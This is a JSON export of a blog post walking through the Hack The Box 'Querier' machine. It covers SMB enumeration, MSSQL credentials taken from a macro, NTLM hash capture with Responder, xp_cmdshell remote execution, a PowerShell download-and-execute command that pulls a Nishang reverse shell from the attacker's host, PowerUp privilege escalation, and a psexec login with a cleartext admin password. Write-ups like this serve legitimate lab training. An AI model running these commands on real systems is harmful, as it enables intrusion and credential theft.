{"id":37,"date":"2021-02-10T10:05:57","date_gmt":"2021-02-10T10:05:57","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=37"},"modified":"2021-02-10T10:06:20","modified_gmt":"2021-02-10T10:06:20","slug":"htb-querier-walkthrough","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2021\/02\/10\/htb-querier-walkthrough\/","title":{"rendered":"HTB &#8211; Querier Walkthrough"},"content":{"rendered":"\n<p>Nmap<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/IjJK3GjIjaw3lWtUAsBwHcOfNDPs9jQimOd6Po0FwMR-nAubpe6j95ZB9Vrbv2qRglNFzZUxZ_iWng1UJW6qWULazZu123ZyWeB0gpnXBIFjIqp84NrZV6LUJ9Qgkap2LVGRcoyC\" alt=\"\"\/><\/figure>\n\n\n\n<p>SMB Shares<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/iyGmJUF89_3hAhuDSY2MnZ90Ye1ZdzHEDSsT0dQqm8OMSNop6mAmbYXPTTQNyhUres01OJG2N2a2Ltg7iYgMQzoDU-Dn_VGfWScp-zJXtm1JiVeNu9Yosibs2th3F-JcT43KZsKx\" alt=\"\"\/><\/figure>\n\n\n\n<p>Get the file and unzip it<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/f6Vd5jGP5UFMGhDeL0yFVh_1PE4EYRMkfMMKvVS6kZclRol57MhM_bVuuX8BF6aA9VQsyGiGYBdvl1HIqYXYPkFp5QNd1tOzL7Vz50TTNCT6f97O5oHR9EpeMyElakxtJgPmbcU9\" alt=\"\"\/><\/figure>\n\n\n\n<p>SQL credentials found in vbaProject.bin<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/qwlD1mbPBRlcUxCYXqVmSYQXSlR1nQf0ledmPwf9QZqSglog7Eu0Np9EkbFXc73Y523FGT9XC3RiIsrk6nQaIwwgewIjFD84c4UKlVSeGXpXEVCZi1vOYHYrODTO0WvNFO8q4KJE\" alt=\"\"\/><\/figure>\n\n\n\n<p>Use Impacket&#8217;s mssqlclient scipt to login<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/stPKaTmlg7yE2pPmgaYXM1M-PUTr6qwS37qiE31OY_kzTtxVBRo9NDJ6mbna6W0IzVtdObNCJYR7--IK5R2GY69_ABHFazuxrPGylQxIf_XCOQOViokPVdHd-pBQvUauaxw47UTF\" alt=\"\"\/><\/figure>\n\n\n\n<p>Try to enable xm_cmdshell but the current user is not privileged<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/HJ9XATPcB0jrrxHC2WbIcfNC7O_bAs1j4MoBp1sfkVW5a1sLmayLwXCRGr3-9GTpzx5p9TMUY1kNWJDejwQGrA72S2GjH4TetDAVBwqZaiMwpqmFzp3ka5ayiLUYY6nfpE2LHVOW\" alt=\"\"\/><\/figure>\n\n\n\n<p>Try to steal credentials by calling a fake share on your own server<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/CKvRDNOnex6dSGDlXZ_qlgZ7H62-hrP_aAZbMVNAx6FKKAdYnNRUO019o5yuuhx9uqDLLSpPsyrZjJKYAu7fK08HD50PvQC31qmzsUb7b4CoUHo8YDKGineIuMgYnT6NUfHkGZpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Listen with responder<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/ebkuSDxqY82FLa346xTJlJjkHzO3_L5li18dJcvQRasmBSs0GGi_foqrpB7PEdHW0rIWYk1g2rBab6Ndntdzu81DLQ5aKm8qyC3vjvGGSSs7Jr1DyktDzQ6I1OIZXL2soL3eygBz\" alt=\"\"\/><\/figure>\n\n\n\n<p>Crack the hash with john<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/hb_bZ0HU4yXPvp0_Q-cd70HJFo2PeTa1vamUq8qb9E5z7tgbmE3DAgsK6-GK8yPT3OR6lKMg-PMtIzBmVo3ZKfNeitKVjCZK8lag5ctXrqS_pqEUL-nV7x7LYQz90iM2qX-cvWQe\" alt=\"\"\/><\/figure>\n\n\n\n<p>Login again as the new user<br>mssqlclient.py mssql-svc@10.10.10.125 -db volume -windows-auth<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/paHzjATeHU46nYqgsuccb64lirdPCAYCm0PWGC2wvI9ND70qA5hrcuJ4MIAmJYKJfWsCDjumjf40oMU3eHlkl-J7GrIYvy36IE2ABxjYVObJJflDHTro9gKU6xsrC7w1qgoEqfFT\" alt=\"\"\/><\/figure>\n\n\n\n<p>Enable xp_cmdshell and now we have an RCE<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/MjDV_ZuJk42JLQWDpDU3uGddkSLjeVWYzfZ-PndhcEq6FzCHGTRp7u7MFTLNX2WEfxqrOSVcVySdPTde65wVxuN977MrRJKgxoIvjRVnK0Dwpim1l-SgbSRYBhwV6O_4BhpCDd6g\" alt=\"\"\/><\/figure>\n\n\n\n<p>Download Nishang Reverse shell from your own box with powershell command to get a reverse shell<a href=\"#\">https:\/\/raw.githubusercontent.com\/samratashok\/nishang\/master\/Shells\/Invoke-PowerShellTcp.ps1<\/a><br>Add the following command at the end of the file<br>Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.16 -Port 4444<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/L2t4not66arnZp4hWHUP_rS7_qUAVzwMmAqLqufddePQLxWb0xCAlzHu3Nk1_YX_vn4yT6TTY4T_1QzadEziYSdc4yyBquU6UJokcyEjvRrFDMmWX6qKZAnnhTVPvTCsbEh3KD6N\" alt=\"\"\/><\/figure>\n\n\n\n<p>&nbsp;Now execute the command on mssql to get a reverse shell<br>EXEC xp_cmdshell powershell iex(new-object net.webclient).downloadstring(\\&#8221;http:\/\/10.10.14.16:8000\/Invoke-PowerShellTcp.ps1\\&#8221;)<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/0bWBPqzncUjyrPKr99T7sqrRuDPihgXUY8op3J3oIiOL9HKVWg1G3-Or71O8u3NMxpo9Lhiy4jHJ6y3lMYJmpdQU9t9JcvtliqSDQCjDJcNPi6Cstein0rNIhz7NPCEJPQmFep5_\" alt=\"\"\/><\/figure>\n\n\n\n<p>Privilege Escalation<br>Get the PowerUp.ps1 scipt to your own boxwget <a href=\"#\">https:\/\/raw.githubusercontent.com\/PowerShellMafia\/PowerSploit\/dev\/Privesc\/PowerUp.ps1<\/a><br>Then send it to Windows box:<br>Invoke-WebRequest 10.10.14.16:8000\/PowerUp.ps1 -OutFile c:\\users\\mssql-svc\\downloads\\PowerUp.ps1<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/PlH6_B1x8FytT1dzg7ftheQ46roTvh4wHGUk_oBgYRxXTWvLVgYS33hkPkPF4ZYsG7umNi4_5udjdTzwoeT0v48uGnQB9EW3hETu7D1gJQ0fisC0kDIJgzpUZD5hBO3oVfbwRFeH\" alt=\"\"\/><\/figure>\n\n\n\n<p>Run the script<br>Import-Module .\\PowerUp.ps1. .\\PowerUp.ps1Invoke-AllChecks<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/n9YmblLFx0UvWb7zFYCTR9cwyugdK3IS8YqJLCZnQKxqoiHRWU0_9t4WROajDcl4Wm6GnAIExYy4IAjrRhE_R1WaJK_bZ84C04DPRI0bGu5aKtR-LkbLp4hZ3xcp7pgs6Hm8mjkU\" alt=\"\"\/><\/figure>\n\n\n\n<p>&nbsp;it will give us clear text credentials form GPP cache<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/9E1HFvQFnIwdzJBAnXU3HC7uFESBQk60D6lCwUIXGOQTWcIVhQkKa-_HEA2rb40pXX3SOxzZNGVNEGfvuU52Eomn5ifY4LuQsmtV1Mb8Q3v2cFhiXWCCo0wrQaHw2eGWPVQn5BvP\" alt=\"\"\/><\/figure>\n\n\n\n<p>psexec.py Administrator:&#8217;MyUnclesAreMarioAndLuigi!!1!&#8217;@10.10.10.125<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/mOWyhwiXADBtpddlxISb8usAyFg6XPFhbPtHls81Xp_X0lCkW_RjYBpXWanTq6w3q2J2Bly2pG06mE_6cAUzGmbeTdGL64Jq4VL8s2mx-OYSnosOUDt9ec-ZemEVK1mQGc0GEmUP\" alt=\"\"\/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>Nmap SMB Shares Get the file and unzip it SQL credentials found in vbaProject.bin Use Impacket&#8217;s mssqlclient scipt to login Try to enable xm_cmdshell but the current user is not privileged Try to steal credentials by calling a fake share on your own server Listen with responder Crack the hash with john Login again as&hellip; <a class=\"more-link\" href=\"https:\/\/areyou1or0.it\/index.php\/2021\/02\/10\/htb-querier-walkthrough\/\">Continue reading <span class=\"screen-reader-text\">HTB &#8211; Querier Walkthrough<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[17],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/37"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=37"}],"version-history":[{"count":1,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/37\/revisions"}],"predecessor-version":[{"id":38,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/37\/revisions\/38"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=37"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=37"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=37"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}